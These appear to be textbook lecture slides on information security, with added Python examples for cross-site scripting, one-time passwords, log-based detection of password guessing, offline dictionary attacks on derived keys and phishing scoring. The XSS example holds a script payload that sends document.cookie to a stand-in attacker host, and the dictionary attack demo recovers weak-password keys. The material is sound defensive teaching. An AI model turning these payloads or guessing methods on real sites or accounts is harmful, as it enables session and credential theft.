  • 8. How Have Big Breaches Occurred? Date Detected Company What was stolen How November 2013 Target 40 million credit & debit cards Contractor opened virus-laden email attachment May 2014 Ebay #1 145 million user names, physical addresses, phones, birthdays, encrypted passwords Employee’s password obtained September 2014 Ebay #2 Small but unknown Cross-site scripting September 2014 Home Depot 56 million credit card numbers 53 million email addresses Obtaining a vendor’s password/exploiting OS vulnerability January 2015 Anthem Blue Cross 80 million names, birthdays, emails, Social security numbers, addresses, and employment data Obtaining passwords from 5 or more high-level employees © 2016 John Wiley & Sons, Inc. 8
  • 9. Password Breaches • 80% of breaches are caused by stealing a password. • You can steal a password by: • Phishing attack • Key logger (hardware or software) • Guessing weak passwords (123456 is most common) • Evil twin wifi © 2016 John Wiley & Sons, Inc. 9
  • 10. Insecurity of WiFi– a Dutch study • “We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.” • Had WiFi transmitter broadcasting “Starbucks” as ID • Because they were connected to him, he scanned for unpatched or vulnerable mobile devices or laptops • He also saw passwords and could lock them out of their own accounts. • The correspondent: “I will never again be connecting to an insecure public WiFi network without taking security measures.” © 2016 John Wiley & Sons, Inc. Slide 5-10
Other Approaches
• Cross-site scripting (XSS): an attacker gets script into a page served by a trusted site so that it runs in other users' browsers; it can steal session cookies or send the user to a link requiring log-in at an imposter site
• Third parties
• The network used by Target's HVAC contractor was connected to Target's main systems
• The contractor had access
• Hackers obtained the contractor's password
• Malware on the point-of-sale systems captured customer credit card data before it could be encrypted
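The cross-site scripting bullet above is easier to see in code. The example below is added here and is not from the textbook; the search page, the parameter name q and the hosts shop.example and evil.example are made up for illustration. It builds the same page twice, once pasting the user's input into the HTML and once escaping it, then tokenises the result the way a browser would to show which version ends up executing the attacker's script.

```python
"""Reflected cross-site scripting: the same page built unsafely and safely.

Added example for the cross-site scripting bullet above; it is not code
from the textbook. The search page, the parameter name q and the hosts
shop.example and evil.example are made up for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed attack inputs. The first is the classic one: a <script> tag
# that ships the victim's session cookie to an attacker-controlled host
# (the victim reached the page through a link such as
# https://shop.example/search?q=<payload>, so the script runs on the
# shop's origin). The second never uses <script>: it closes the
# value="..." attribute and adds an event handler, which is why escaping
# must cover quotes as well as angle brackets.
SCRIPT_PAYLOAD = '<script>fetch("https://evil.example/?c="+document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def search_page_unsafe(query: str) -> str:
    """Vulnerable: the untrusted query is pasted straight into the HTML."""
    return ("<html><body>"
            f"<h1>Results for {query}</h1>"
            f'<input name="q" value="{query}">'
            "</body></html>")


def search_page_safe(query: str) -> str:
    """Hardened: every untrusted value is escaped before it lands in HTML.
    html.escape(quote=True) turns & < > " ' into entities, so the browser
    treats the input as text, never as a tag or an attribute delimiter."""
    q = html.escape(query, quote=True)
    return ("<html><body>"
            f"<h1>Results for {q}</h1>"
            f'<input name="q" value="{q}">'
            "</body></html>")


class BrowserView(HTMLParser):
    """Tokenises a page the way a browser would, so we can ask which tags
    and attributes the victim's browser would actually act on."""

    def __init__(self) -> None:
        super().__init__()
        self.script_seen = False
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_seen = True
        if tag == "input" and not self.input_attrs:
            self.input_attrs = dict(attrs)


def browser_view(page: str) -> BrowserView:
    view = BrowserView()
    view.feed(page)
    view.close()
    return view


def executes_attacker_code(page: str) -> bool:
    """True if the rendered page would run attacker-supplied script: an
    injected <script> element or an injected on* event-handler attribute."""
    view = browser_view(page)
    return view.script_seen or any(a.startswith("on") for a in view.input_attrs)


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("unsafe page executes attacker code:", executes_attacker_code(search_page_unsafe(payload)))
        print("safe page executes attacker code:  ", executes_attacker_code(search_page_safe(payload)))
```

Note that the safe page still shows the attacker's text to the user; it just shows it as text. The attribute payload is the reason "escape the angle brackets" is not enough: without quote=True the attacker breaks out of value="..." and gets an event handler without ever writing <script>.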
Cost of Breaches
• Estimated at $145 to $154 per stolen record
• Revenue is lost when sales decline
• Some costs can be recouped through insurance
Can You Be Safe?
• No, unless the information is permanently inaccessible
• "You cannot make a computer secure" (Dain Gary, former CERT chief)
• 97% of all firms have been breached
• Sometimes security makes systems less usable
What Motivates the Hackers?
• Stolen credit card numbers sell for up to $50 each
• 2 million Target card numbers were sold for $20 each on average
• Street gang members can usually get $400 out of a card
• Some "kits" (card number plus SSN plus medical information) sell for up to $1,000
• Kits allow the buyer to open new card accounts in the victim's name
• Stolen cards are sold for bitcoin on dark-web markets (what the slide calls the Deep Web)
What Should Management Do?
• Security strategy
• Infrastructure
• Access tools *
• Storage and transmission tools *
• Security policies *
• Training *
• Investments
* Described on the following slides
Access Tools
Physical locks (ubiquity: very high)
  Advantages: excellent if guarded
  Disadvantages: locks can be picked; keys can be lost; attackers often do not need physical access at all
Passwords (ubiquity: very high)
  Advantages: user acceptance and familiarity; ease of use; mature practices
  Disadvantages: poor by themselves; sometimes forgotten; sometimes stolen from users by deception or key loggers
Biometrics (ubiquity: medium)
  Advantages: can be reliable; never forgotten; cannot be lent or shared the way a password can; can be inexpensive
  Disadvantages: false positives and false negatives; some are expensive; some traits change (e.g., voice); lost limbs; loopholes (e.g., a photo fooling a face scanner); a stolen biometric template cannot be reissued the way a password can be reset
Access Tools (continued)
Challenge questions (ubiquity: medium, high in banking)
  Advantages: not forgotten; a multitude of questions can be used
  Disadvantages: social networking might reveal some answers; personal knowledge of an individual might reveal the answers; spelling might not be consistent
Token (ubiquity: low)
  Advantages: a stolen passcode is useless quickly (codes change every 30 to 60 seconds)
  Disadvantages: requires carrying a device
Text message (ubiquity: medium)
  Advantages: a stolen passcode is useless once it expires; the mobile phone is already owned by users; useful as a secondary mechanism too
  Disadvantages: requires mobile phone ownership by all users; the home phone option requires speech synthesis; requires alternative access control if the mobile phone is lost; SMS codes can be intercepted (SIM swap) or phished in real time, so they are weaker than a token or authenticator app
Multi-factor authentication (ubiquity: medium)
  Advantages: a stolen password alone is useless; enhanced security
  Disadvantages: requires an additional technique if one of the factors fails; temptation to choose an easy password
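The token, text message and multi-factor rows all rest on the same mechanism: a code that is only valid for a short window and only once. The example below is added here and is not the textbook's code. It implements the standard time-based one-time password (RFC 6238, built on RFC 4226 HOTP) with the Python standard library and adds the server-side check that makes a captured code "useless quickly": the verifier accepts one step of clock skew either way but remembers the last step it accepted, so a code phished or keylogged from the user cannot be replayed even inside its 30-second window. The shared secret is the RFC test secret and the timestamps are constructed.

```python
"""Time-based one-time passwords (RFC 6238) and why a stolen code goes stale.

Added example for the token / text-message / multi-factor rows above; not
the textbook's code. The shared secret is the RFC 6238 test secret (real
secrets are random) and the timestamps are constructed.
"""
import hashlib
import hmac
import struct
import time

STEP_SECONDS = 30


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then
    dynamic truncation to a `digits`-digit decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, at=None, digits: int = 6, step: int = STEP_SECONDS) -> str:
    """RFC 6238 TOTP: HOTP with the counter = floor(unix_time / step)."""
    t = time.time() if at is None else at
    return hotp(secret, int(t // step), digits)


class TotpVerifier:
    """Server-side check. Accepts the current step and one step either side
    (clock skew) and remembers the last accepted step, so a code captured
    by shoulder-surfing, phishing or a key logger cannot be replayed even
    while it is nominally still valid."""

    def __init__(self, secret: bytes, digits: int = 6, step: int = STEP_SECONDS, skew: int = 1):
        self.secret, self.digits, self.step, self.skew = secret, digits, step, skew
        self.last_accepted_step = -1

    def verify(self, code: str, at=None) -> bool:
        t = time.time() if at is None else at
        now = int(t // self.step)
        for candidate in range(now - self.skew, now + self.skew + 1):
            if candidate <= self.last_accepted_step:
                continue  # already redeemed, or older than a redeemed code
            expected = hotp(self.secret, candidate, self.digits)
            if hmac.compare_digest(expected, code):  # constant-time compare
                self.last_accepted_step = candidate
                return True
        return False


SECRET = b"12345678901234567890"  # RFC 6238 test secret; real ones are random bytes


def demo(now: float = 1_700_000_000.0) -> dict:
    """Constructed scenario: the user logs in with a fresh code, an attacker
    who captured that code tries it 5 s later, and another attacker tries a
    code that is 90 s old against a server that never saw it."""
    server = TotpVerifier(SECRET)
    code = totp(SECRET, now)
    return {
        "user_logs_in": server.verify(code, now),
        "attacker_replays": server.verify(code, now + 5),
        "attacker_late": TotpVerifier(SECRET).verify(code, now + 90),
    }


if __name__ == "__main__":
    print(demo())
```

The replay check is the part most home-grown implementations miss: without last_accepted_step a phishing page that relays the code to the real site within 30 seconds still wins, which is exactly the real-time phishing caveat in the text-message row.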
Storage and Transmission Tools
Antivirus / antispyware (ubiquity: very high)
  Advantages: blocks many known threats; blocks some "zero-day" threats
  Disadvantages: slows down the operating system; "zero-day" threats can be missed
Firewall (ubiquity: high)
  Advantages: can prevent some targeted traffic
  Disadvantages: filters only by address, port and protocol, so attacks carried inside allowed traffic (web, email) pass through; can have well-known "holes"
System logs (ubiquity: very high)
  Advantages: can reveal the IP address of the attacker; can estimate the extent of the breach
  Disadvantages: hackers can conceal their IP address; hackers can delete logs unless they are forwarded to a separate log server; logs can be huge; inspections are irregular
System alerts (ubiquity: high)
  Advantages: can help point to the relevant logs; can detect an attack in progress
  Disadvantages: high sensitivity, low selectivity (many false alarms)
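"Irregular inspections" is the real weakness of logs, and "high sensitivity, low selectivity" is the real weakness of alerts. The example below is added here and is not the textbook's code. It runs simple detection logic over a constructed excerpt of sshd-style authentication log lines (RFC 5737 test addresses) and raises two kinds of alert: a burst of failed logins from one source, and a successful login from a source that was guessing moments earlier. The threshold and window are assumptions; they are the knobs that trade sensitivity against selectivity.

```python
"""Password-guessing detection over sshd-style authentication log lines.

Added example for the System logs / System alerts rows above; not the
textbook's code. The log excerpt is constructed (RFC 5737 test addresses),
and the threshold and window are assumptions to tune against real traffic.
"""
import re
from collections import defaultdict, namedtuple
from datetime import datetime

SAMPLE_LOG = """\
Jun 12 03:14:01 bastion sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Jun 12 03:14:03 bastion sshd[2212]: Failed password for root from 203.0.113.7 port 51023 ssh2
Jun 12 03:14:05 bastion sshd[2213]: Failed password for invalid user test from 203.0.113.7 port 51024 ssh2
Jun 12 03:14:08 bastion sshd[2214]: Failed password for deploy from 203.0.113.7 port 51025 ssh2
Jun 12 03:14:10 bastion sshd[2215]: Failed password for deploy from 203.0.113.7 port 51026 ssh2
Jun 12 03:14:13 bastion sshd[2216]: Failed password for deploy from 203.0.113.7 port 51027 ssh2
Jun 12 03:14:20 bastion sshd[2217]: Accepted password for deploy from 203.0.113.7 port 51028 ssh2
Jun 12 03:40:12 bastion sshd[2301]: Failed password for alice from 198.51.100.5 port 40011 ssh2
Jun 12 03:41:30 bastion sshd[2302]: Accepted publickey for alice from 198.51.100.5 port 40012 ssh2
Jun 12 03:42:00 bastion cron[2310]: (root) CMD (run-parts /etc/cron.hourly)
"""

Event = namedtuple("Event", "ts result method user ip")

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line: str):
    """Return an Event for sshd login lines, None for everything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
    return Event(ts, m["result"], m["method"], m["user"], m["ip"])


def detect(log_text: str, threshold: int = 5, window_seconds: int = 120) -> list:
    """Sliding-window detector.

    Alerts:
      password_guessing      -- `threshold` failures from one IP within the window
      success_after_guessing -- a login accepted from an IP that just crossed
                                the threshold (the guess probably worked)
    Each alert is (kind, ip, user, hh:mm:ss).
    """
    recent_failures = defaultdict(list)  # ip -> timestamps of failures in window
    already_flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        window = [t for t in recent_failures[ev.ip]
                  if (ev.ts - t).total_seconds() <= window_seconds]
        recent_failures[ev.ip] = window
        when = ev.ts.strftime("%H:%M:%S")
        if ev.result == "Failed":
            window.append(ev.ts)
            if len(window) >= threshold and ev.ip not in already_flagged:
                already_flagged.add(ev.ip)
                alerts.append(("password_guessing", ev.ip, ev.user, when))
        elif len(window) >= threshold:
            alerts.append(("success_after_guessing", ev.ip, ev.user, when))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

With the defaults the 203.0.113.7 burst fires on its fifth failure and the later "Accepted password for deploy" from the same address fires the second alert; alice's single typo followed by a key-based login produces nothing. Raising the threshold to 7 silences both alerts, which is the selectivity trade-off in one line.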
Storage and Transmission Tools (continued)
Encryption (ubiquity: very high)
  Advantages: difficult to access a file without the key; long random keys could take years, or far longer, to break by brute force
  Disadvantages: the key is not needed if the password that protects or generates it is known; if the key is weak or derived from a guessable password, hackers can recover it by trial and error
WEP/WPA (ubiquity: very high)
  Advantages: same as encryption; most devices have the capability; provides a secure Wi-Fi connection (with WPA2 or later)
  Disadvantages: same as encryption; some older devices have limited protections; WEP is not secure (its key can be recovered in minutes) yet it is still offered, so choose WPA2 or WPA3
VPN (ubiquity: medium)
  Advantages: a trusted connection, as if you were connected on site; hard to decrypt
  Disadvantages: the device could be stolen while connected; sometimes slows the connection
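The "guessing weak passwords" bullet on the Password Breaches slide and the "trial and error" disadvantage in the Encryption row above are the same attack seen from two sides: a 256-bit key derived from 123456 has six digits of strength, not 256 bits. The example below is added here and is not the textbook's code. It derives a key from a password with PBKDF2 (standard library), runs an offline dictionary attack against it with a constructed ten-entry word list (real breach-derived lists run to hundreds of millions), and measures what a slow key-derivation function does to the attacker's cost per guess.

```python
"""Trial-and-error recovery of a key derived from a weak password.

Added example for the Password Breaches slide (guessing weak passwords)
and the Encryption row above (a key is only as strong as the secret it is
derived from). Not the textbook's code. The word list is a constructed
fragment of the usual top-of-the-breach-list entries.
"""
import hashlib
import hmac
import os
import time

COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "iloveyou",
                    "admin", "welcome", "monkey", "dragon", "football"]


def derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA256 -> 256-bit key. The key length does not help when
    the input space is a short list of common passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                               iterations, dklen=32)


def guess_password(target_key: bytes, salt: bytes, iterations: int,
                   wordlist=COMMON_PASSWORDS):
    """Offline dictionary attack: derive a key from each candidate and compare
    (constant-time). Returns (password_or_None, guesses_tried). The attacker
    needs the salt, but salts are stored next to the key, so that is normal."""
    for n, candidate in enumerate(wordlist, start=1):
        if hmac.compare_digest(derive_key(candidate, salt, iterations), target_key):
            return candidate, n
    return None, len(wordlist)


def seconds_per_guess(iterations: int, samples: int = 3) -> float:
    """What one candidate costs the attacker at this iteration count."""
    salt = os.urandom(16)
    start = time.perf_counter()
    for _ in range(samples):
        derive_key("x", salt, iterations)
    return (time.perf_counter() - start) / samples


def demo(iterations: int = 100_000) -> dict:
    """Constructed scenario: one key from the most common password, one from
    a long random passphrase, both with a fresh per-user salt (which is what
    makes precomputed rainbow tables useless)."""
    salt = os.urandom(16)
    weak = guess_password(derive_key("123456", salt, iterations), salt, iterations)
    strong = guess_password(derive_key("orbit lantern quince 4711", salt, iterations),
                            salt, iterations)
    return {"weak": weak, "strong": strong}


if __name__ == "__main__":
    print(demo())
    print("cost/guess at 1 iteration:     %.2e s" % seconds_per_guess(1))
    print("cost/guess at 100k iterations: %.2e s" % seconds_per_guess(100_000))
```

The weak key falls on the second guess regardless of the iteration count; what the iteration count changes is that a list of a billion candidates goes from seconds to years per key. That is the whole argument for a slow KDF (PBKDF2, scrypt, Argon2) over a plain hash, and it does nothing for a user whose password is on the list.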
Security Policies
• Perform security updates promptly
• Separate unrelated networks
• Keep passwords secret
• Manage mobile devices (BYOD)
• Formulate data policies (retention and disposal)
• Manage social media (rules as to what can be shared and how to identify yourself)
• Use consultants (Managed Security Services Providers)
SETA (Security Education, Training, and Awareness)
• Training on access tools
• Limitations of passwords
• Formulating a password
• Changing passwords periodically
• Using multi-factor authentication
• Using password managers
SETA (Security Education, Training, and Awareness)
• BYOD
  • Rules
  • How to follow them
• Social media
  • Rules
  • How to follow them
  • Cases from the past that created problems
SETA (Security Education, Training, and Awareness)
• Vigilance: recognizing
  • Bogus warning messages
  • Phishing emails
  • Physical intrusions
  • Ports and access channels to examine
Classic Signs of Phishing
• Account is being closed
• Email in-box is full
• Winning a contest or lottery
• Inheritance or commission to handle funds
• Product delivery failed
• Odd URL when hovering
• Familiar name but strange email address
• Poor grammar/spelling
• Impossibly low prices
• Attachment with EXE, ZIP, or BAT (etc.)
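Several of the signs above can be checked mechanically before a user ever sees the message. The example below is added here and is not the textbook's code. It parses a constructed message with the standard email module and scores it against the signs that have a machine-readable form: a familiar brand name on an address from the wrong domain, an account-closed or lottery pretext in the subject, a link whose visible text names one host while the href points to another (what "odd URL when hovering" means), and risky attachment types. The brand table is an assumption standing in for an organisation's own list of domains its senders really use, and all domains use the reserved .example TLD.

```python
"""Scoring a message against the phishing signs listed above.

Added example, not the textbook's code. The message is constructed, the
KNOWN_BRANDS table is an assumption standing in for an organisation's real
sender list, and the domains use the reserved .example TLD.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Assumption: brands the organisation expects mail from and their real domains.
KNOWN_BRANDS = {"acme bank": "acme-bank.example"}

URGENCY_PHRASES = ("account is being closed", "account will be closed",
                   "inbox is full", "in-box is full", "you have won", "lottery",
                   "inheritance", "commission", "delivery failed",
                   "could not be delivered")
RISKY_EXTENSIONS = (".exe", ".zip", ".bat", ".scr", ".js", ".vbs", ".cmd")

LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)

CONSTRUCTED_MESSAGE = """\
From: "Acme Bank Security" <alerts@acme-bank-verify.example>
To: customer@example.com
Subject: Your account is being closed - act now
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>Dear customer, your acount will be closed in 24 hours unless you verify
you identity here:
<a href="http://acme-bank.login-verify.example/secure">https://www.acme-bank.example/login</a></p>
--b1
Content-Type: application/zip; name="statement.zip"
Content-Disposition: attachment; filename="statement.zip"
Content-Transfer-Encoding: base64

UEsDBAoAAAAAAA==
--b1--
"""


def _domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def phishing_indicators(raw: str) -> list:
    """Return a human-readable list of the phishing signs found in `raw`."""
    msg = email.message_from_string(raw, policy=policy.default)
    hits = []

    # Familiar name but strange email address
    name, addr = parseaddr(str(msg["From"] or ""))
    for brand, real_domain in KNOWN_BRANDS.items():
        if brand in name.lower() and _domain(addr) != real_domain:
            hits.append(f"familiar name {name!r} but address domain {_domain(addr)}")

    # Account-closed / lottery / delivery-failed pretexts in the subject
    subject = str(msg["Subject"] or "").lower()
    if any(p in subject for p in URGENCY_PHRASES):
        hits.append(f"urgency pretext in subject: {subject!r}")

    for part in msg.walk():
        # Odd URL when hovering: the visible text names one host, the href another
        if part.get_content_type() == "text/html":
            for href, text in LINK_RE.findall(part.get_content()):
                shown = urlparse(text.strip()).hostname
                actual = urlparse(href).hostname
                if shown and actual and shown != actual:
                    hits.append(f"link text shows {shown} but points to {actual}")
        # Attachment with EXE, ZIP, BAT and friends
        filename = part.get_filename()
        if filename and filename.lower().endswith(RISKY_EXTENSIONS):
            hits.append(f"risky attachment {filename}")
    return hits


def phishing_score(raw: str) -> int:
    """Number of independent signs; two or more is usually worth quarantining."""
    return len(phishing_indicators(raw))


if __name__ == "__main__":
    for hit in phishing_indicators(CONSTRUCTED_MESSAGE):
        print("-", hit)
    print("score:", phishing_score(CONSTRUCTED_MESSAGE))
```

The constructed message trips four of the signs. The misspellings ("acount", "you identity") are deliberately left to the reader: poor grammar is the one sign on the list that is still easier for a person to judge than for a short script, which is why the SETA slides train people on it.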

Editor's Notes

  1. The hackers did not carry out a dramatic and quick theft; they had a year to steal the records at their leisure. The theft took place over about a year and began with a stolen password. It took OPM many months to detect it. Early reports said that at least 4 million, and as many as 14 million, records were stolen. Each record contained a 127-page security-clearance application that includes sensitive medical, personal and relationship information.